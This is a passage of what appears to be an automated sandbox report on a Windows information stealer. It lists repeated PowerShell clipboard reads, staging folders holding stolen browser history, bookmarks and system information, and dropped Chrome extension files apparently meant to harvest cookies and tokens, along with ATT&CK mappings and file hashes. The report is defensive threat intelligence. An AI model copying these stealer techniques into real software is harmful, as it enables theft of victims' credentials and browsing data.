      PID:6020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7784
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5880
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7084
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3176
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7624

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:7224

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\System\BVRKIPTS - 2024-05-28_223600.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:1244

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:6832

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\System\System Info.txt
1⤵
PID:8148

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\Logs\Error.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:7416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-cookies\content.js

Filesize
2KB

MD5
cb709bae3938a1fb2e1e908541145f9e

SHA1
19b31a4545678eb5a87f55333c84720ff014b0ec

SHA256
54483120814462fff239cc5d12363ad84706438ff88a3262001ed9789426d7a0

SHA512
19aa4362f0e6f6d52e0efeff6722874abc56b14c15c0a921cc7e24d814667abe8fe1aeef30f8f96b0d574382496fdf3ffc3208c276c5daf6654148a42356ccb3

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

Filesize
978B

MD5
04c23766134b234e85cc537b2162efb1

SHA1
45c48d9ca30a4580a682f025cc66331e49f6f158

SHA256
f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900

SHA512
d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-cookies\scripts\background.js

Filesize
7KB

MD5
6df7a94a8326d3293f348c35cf6b853c

SHA1
5f4eb7960ac626e558f787b9cb9a44576b1cf501

SHA256
91cf36bfa1a78363106a78818abecfa67f6dd1c4049c3118a5bcd3b9cc055b2a

SHA512
03731cb712c8a57c53deb43b2684d5870ee688332eec6d6ea7f8d11d92ad4cfce6e85f4981ff3cf9d7e24b07af7aef678cf7c5c8b7a5eec12f7fca19dcd27dc1

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

Filesize
43KB

MD5
252b4fda07550496d330d819f15ceb3e

SHA1
650584312b310219a26d5fc20cb1804bb6c4dde5

SHA256
39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d

SHA512
a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

Filesize
78KB

MD5
2b67e47cb8da1058770fe41d8b947619

SHA1
9eb259b1d377a24a2b77a694cf31c23cef7b8eef

SHA256
46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a

SHA512
27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

Filesize
33KB

MD5
c555604e8b6f818991e186342f856b1b

SHA1
3ae02db8eba2f4fa30cb7567a9f5bf8346faded0

SHA256
012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972

SHA512
01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

Filesize
1KB

MD5
f0f11cd478cc44d518c16820ede9d253

SHA1
cfaf8d2e071f2ade0894578e5b44e02032d27be4

SHA256
321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb

SHA512
ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

Filesize
2KB

MD5
192e90432fed0081abb25295d8f309c4

SHA1
5150e93061f39e26688afd60a04c0ab14b510d47

SHA256
3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2

SHA512
9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

Filesize
5KB

MD5
2f0a6a34d9b95bba0e3358ddd41ff2ac

SHA1
f39a9e7aeab9fe86fd9034284516de40186e6e93

SHA256
6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5

SHA512
a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

Filesize
87KB

MD5
9ac39dc31635a363e377eda0f6fbe03f

SHA1
29fa5ad995e9ec866ece1d3d0b698fc556580eee

SHA256
9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38

SHA512
0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

Filesize
790B

MD5
42ac88deb5c3cfc02fdc1c27319ee067

SHA1
97b1addf35159800b90743fcfbb5505e80f6eb82

SHA256
28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb

SHA512
77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History_tmp

Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp

Filesize
100KB

MD5
bfbf67a3ad4b5c0f7804f85d1f449a80

SHA1
110780a35d61de23b5fcb7b9e75a3ed07deb7838

SHA256
2a38ab429847061aa3c614982e801e2e7139977a227466ce5ee61fa382a2bc2e

SHA512
77bd3011b5d0074af16b93a5ab1967379a0a032bbf43c1e7b6ef205aeb27454e079c94e419bea6f7d730dc84b632e44250203a508fcdcd864ada9888381f4fdd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ce4c898f8fc7601e2fbc252fdadb5115

SHA1
01bf06badc5da353e539c7c07527d30dccc55a91

SHA256
bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa

SHA512
80fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4158365912175436289496136e7912c2

SHA1
813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59

SHA256
354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1

SHA512
74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
288B

MD5
3a6cea8004ab2541ec219949fd56dc39

SHA1
30f6b5799426957f2bcc768dca651a3fe24fecbf

SHA256
a27979c3343dc47360f936104e7e52825e6425cbaf50f7a6f7a2c92ca831de2a

SHA512
4cf7b3a7891b867b004139b1938617457514cb003b7830eb6fd463fdbb9d5518411a3f5f6c076204bf4634cd3afaaac23e7605cd6934e0d3d84c5f0d2e5cc275

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp

Filesize
124KB

MD5
1aae592662d0393bf6af2ec5acd3b3d2

SHA1
516128494c6342684a6587ebdada836c28efd774

SHA256
beb3562a28883f9804c8c90a62585425b33a36bc30919c9a2bb5587ea6d29105

SHA512
5ffd8f6349e9f2589dc5301cba425e1fe93a9d1ece61a92b740f0012598ac7abe358570e8b1b8616776719b27d973683e814d0e4e168a386d416ad5cc35f907e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
11b4a73113f7fd93dd10f2d4a49d3410

SHA1
c72a08c39bdb4754e31efc1daa08ed23d32d3300

SHA256
adf92dc8106291954f1cf01436a921006c4a0bc596dd5adf3204e2c40275e01b

SHA512
91462f64ffc1459891efd8ce030e21d61b104ce735c559db3fbdbb5b03cd0383875d15e5ed8bdfa20b1a60553d8e908d6462aec787528bf34b0284df0de00c74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2cc835e7c9324c991cf52a9460118c81

SHA1
e0bc72c626cd2c37b281aeb7577f61c33914a569

SHA256
cc18600a3a28308aaa1ab405122fc81057e6faf0ae626ea3ab2ea6cbfe96a27b

SHA512
33056ba633d57152a4cfbfbf608f5581aa256c6d4b6c23260873f6441bf987a4b62de06e0c3d6ffaf3f181f03c7d6287a6c59b960713a203d21ee642ed530e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
225c244f5d78b9088e7ba8caae3a0ff6

SHA1
8771f1d20ed9fd69f7eb9d71fa64550b7ffda60b

SHA256
4d40f9bb30a9741933a8943534081e582669e1d534964b8ddb7ea481301b1b98

SHA512
2efa2b275240359d282be5ab0ddd71b9ec138b6ee1f74481f5851cb39624b30b9ee5270b99353f0119bbc8151cba56995a3c0a880af8651a9269586d6b5b243f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
751de6a3296da5b064e88d21c15a9908

SHA1
aabe2f1ca05914d7f0f32add4e873e405559bfb8

SHA256
b0d94844130d28ce1391289f6e8805e60f4071802ad76030b69884ed29e3b046

SHA512
f45f65cd46066d8b7334b9fb0b06132c766f5987b6a9526d22cfcb754cd594ea65b90a4349aeeb991f64a5af03567cf0becccfb8926482cf011b6846a383ee66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\600294a7-c345-47ef-8868-f44e31aa4afd.tmp.node

Filesize
153KB

MD5
ee8aa31dabb4754abcd48545aa3acb0b

SHA1
2a979c3a79cc918fbe0ff5a0aade5a06983ecbe3

SHA256
66b11cf2ed42d38a8705cab5df92d44a07f251accb6dab4cc2cbc4be6c66472e

SHA512
c743a807508c85baca98da2f8e730ee274c9ffd353dc6322e485968a492eeab0644b65ba3b113b26d4aa1bebeac8765fd9dbec366019096cdd96ac93d7bf57c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\Browsers\Bookmarks.txt

Filesize
2KB

MD5
2259db41600a19785ca8c84d1c0dc937

SHA1
ffd2f8be1cd12fb591096f7d06f58bcd42288ff7

SHA256
2a14503c4de136b73ebe9bc97191623b61c886bb8a0f7c07cb8247a0fb5a34a5

SHA512
af92f32307ec2e7cee71d1d6f34a58c9c23db3415aa329268f58ee77e13cb5dbc3e163ea6be16b3e8aaf46946aba938fabca0af6a9fe60272d9f839066e435ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\Browsers\History.txt

Filesize
1KB

MD5
92b9d55288af3b729c5cdfed5e7dc566

SHA1
c2dde6bf2205640460e498fd160f284c566a170b

SHA256
707ccf6aaeaf6ce492f467d05f7d180b7a1084ab2eea2caf1cff749b7c4eb23d

SHA512
38dafc44a50071bd067dd774c0d3ec50beb55a18a1db77d07250e3025e3b3ca91b33ef9e3351ff9be05c02a5a161230d1bc3ff54644c2e7b8e1f1c11c38b7248

Download Submit
C:\Users\Admin\AppData\Local\Temp\8wIeLn5S7jYTPuFz1nC4\System\System Info.txt

Filesize
3KB

MD5
8523d1f698ec8b6234322f40eb4196f3

SHA1
963f2f9293f54a5b186b8c18d9072dcdc20b1017

SHA256
f70a1584a2d128e47d58dac00465e241a8bf0a1bce1289a566e7c5a1665cfd62

SHA512
03ee7440e0aebb6ee9bb25c095b94d2b4677d886b73fa9dea6fd65315c2dd0edef0686afd3fd39bc25a2862087a19990e7dae9216aeff53cec6dae567d9e0e0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\@Admin_Keywords.zip

Filesize
22B

MD5
76cdb2bad9582d23c1f6f4d868218d6c

SHA1
b04f3ee8f5e43fa3b162981b50bb72fe1acabb33

SHA256
8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85

SHA512
5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip

Filesize
3KB

MD5
6fd06177c13a57723e484ebc641dc7a2

SHA1
2660486b307a13709f46c2b16814ef83cbd831e9

SHA256
d278d9297bcb9051568c010dba1e98083986a8c9619ecb0ec2ca54d5778905e6

SHA512
ca34fe8bed16459ea081680152642d2536ed5dcb3dcc875738e7eb3c30b2698b0eba326731319a51c18b1dbdc6a02fbd53130a755261f65609462d5df7197c56

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip

Filesize
4KB

MD5
c1dad70c37e37df89d862824074e3f51

SHA1
a1f8b629815a73d92e51952232cb9adb4022cb63

SHA256
8ad78f213b1fd44e2eccb2c5e023820228afaad03b843282ebb693c69e286664

SHA512
eebc7268102f6de61c283b062d8f8981bcdf81f907a0b8b775c2e1915b87310cb2cd825c784a62713a1d976e5f88801323e1dfcbfddf3e60044875934a10ead4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uiourwd0.hxw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ac45c2b1-bff7-4abc-a474-04afcde5892c.tmp.node

Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\LICENSE.electron.txt

Filesize
1KB

MD5
4d42118d35941e0f664dddbd83f633c5

SHA1
2b21ec5f20fe961d15f2b58efb1368e66d202e5c

SHA256
5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d

SHA512
3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\LICENSES.chromium.html

Filesize
8.8MB

MD5
2675b30d524b6c79b6cee41af86fc619

SHA1
407716c1bb83c211bcb51efbbcb6bf2ef1664e5b

SHA256
6a717038f81271f62318212f00b1a2173b9cb0cc435f984710ac8355eb409081

SHA512
3214341da8bf3347a6874535bb0ff8d059ee604e779491780f2b29172f9963e23acbe3c534d888f7a3b99274f46d0628962e1e72a5d3fc6f18ca2b62343df485

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\chrome_100_percent.pak

Filesize
132KB

MD5
a0e681fdd4613e0fff6fb8bf33a00ef1

SHA1
6789bacfe0b244ab6872bd3acc1e92030276011e

SHA256
86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2

SHA512
6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\chrome_200_percent.pak

Filesize
190KB

MD5
c37bd7a6b677a37313b7ecc4ff01b6f5

SHA1
79db970c44347bd3566cefb6cabd1995e8e173df

SHA256
8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a

SHA512
a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\d3dcompiler_47.dll

Filesize
4.7MB

MD5
2191e768cc2e19009dad20dc999135a3

SHA1
f49a46ba0e954e657aaed1c9019a53d194272b6a

SHA256
7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d

SHA512
5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\ffmpeg.dll

Filesize
2.8MB

MD5
a9ea2fab0940c6d0d04deb70e0f81b48

SHA1
a992109beec766bf315da8035a6eaa5c3e4660d2

SHA256
6b721af2850f8654d42585e363e1ffa2e92843b3b84bb2e0074cd954966300ff

SHA512
014e3fafaa84f433c26d77e666ba94f0e364d7ae4268602742af9ab81169601a1e94d20a8a0a4328573b6f36052e2afe0745374c03c71b4d853c825df9372096

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\icudtl.dat

Filesize
10.2MB

MD5
e0f1ad85c0933ecce2e003a2c59ae726

SHA1
a8539fc5a233558edfa264a34f7af6187c3f0d4f

SHA256
f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb

SHA512
714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\libEGL.dll

Filesize
477KB

MD5
f1c6c87ee66112b3c7cce3ad1cab59c8

SHA1
cce4f00e654c10ea5408897296a269be79a21a2e

SHA256
5318dc1ede886a1d33c7243f68847e6c29436f3f7d1891a6803c70aaea3a278d

SHA512
ddec01354988ce401a1fbdf06c57b25acfcfd8dfbcd58337f029f579e9f6c7cdc98aeee9001073de88db192d4b7ac6bda4b3bcccf2aa5d8f136aef580c95bcc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\libGLESv2.dll

Filesize
7.3MB

MD5
d5993dd046fc7331aa3da6a6a68f634f

SHA1
f7a8fa4add31e581d7af8f1e832168e29c7c759a

SHA256
158cc009ec9b331b6b279818743e451c3ee706b8faac52e85ffedeff4643ffab

SHA512
e37bcfb2919ae649ab9be9f15150f5cc221d07913a4d6872060d722fbada266620868de2179ffefd04d119f08909a6635561078b0a24b59e60478e42770f162d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\locales\af.pak

Filesize
447KB

MD5
917a688d64eccf67fef5a5eb0908b6d4

SHA1
7206b01bbc3fd8cc937db9050dd8ac86cf44d8cc

SHA256
6981249837ad767fc030edc8838878a5e493fb08cc49982cffaed16cfbeb564d

SHA512
195dbec8463cf89990232296c5c927e1501f0c2e01a7be7c6a6acae651853ce1edb23d639af65979b39a3c61979119c3a305acfa3aadf0cb93e241c5e57f4534

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\locales\am.pak

Filesize
727KB

MD5
3cfd7c5bb92ab72c63e003208a9e4529

SHA1
165d2f69ab6a6e237f0fec943b5577123cefea87

SHA256
12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b

SHA512
cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\locales\ar.pak

Filesize
794KB

MD5
3c2ab7363018db1f20b90acbc305cb4c

SHA1
60b9cf453178ad0e60faf20d137a0c7eabde65c9

SHA256
3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf

SHA512
589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\locales\bg.pak

Filesize
828KB

MD5
a69f6075863d47b564a2feb655a2946f

SHA1
062232499ff73d39724c05c0df121ecd252b8a31

SHA256
a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334

SHA512
930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db

Download Submit
C:\Users\Admin\AppData\Local\Temp\nshBF78.tmp\7z-out\locales\bn.pak

Filesize
1.0MB

MD5
d43ce80ddca3fab513431fa29be2e60a

SHA1
3e82282e4acfec5f0aca4672161d2f976f284a0c

SHA256
87670ff2ceb1ebc38fce2c3b745ac965f3de5de3133d99ed33933a8f3e99d874

SHA512
